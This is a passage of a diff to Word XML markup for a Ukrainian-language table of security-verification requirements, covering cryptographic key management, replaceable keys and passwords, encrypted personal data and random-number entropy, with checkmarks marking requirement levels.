+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21190,7 +23179,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -21201,103 +23190,13 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переко</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">найтеся, що існує явна політика </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>того, як криптографічні ключі управляються (наприклад, згенерован</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>і</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, розподілені, анульовані). </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Переконайтеся в тому, що життєвий цикл</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ключів</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> дотримува</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>єтться</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> належним чином.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
+              <w:t>5.6</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21325,14 +23224,44 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся в тому, що всі ключі і паролі можуть бути зам</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>інені, і генеруються або замінюються</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> під час установки.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21360,14 +23289,52 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21395,16 +23362,24 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5.7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21443,13 +23418,13 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5.5</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
+              <w:t>Переконайтеся в тому, що випадкові числа створюються при правильній ентропії, навіть якщо додаток знаходиться під великим навантаженням.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21480,51 +23455,11 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Персональні дані повинні зберіга</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">ються в зашифрованому вигляді. </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>П</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ереконайтеся, що зв'язок йде через захищені канали.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21559,7 +23494,8 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21590,455 +23526,16 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>5.6</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Переконайтеся в тому, що всі ключі і паролі можуть бути зам</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>інені, і генеруються або замінюються</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> під час установки.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>5.7</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Переконайтеся в тому, що випадкові числа створюються при правильній ентропії, навіть якщо додаток знаходиться під великим навантаженням.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
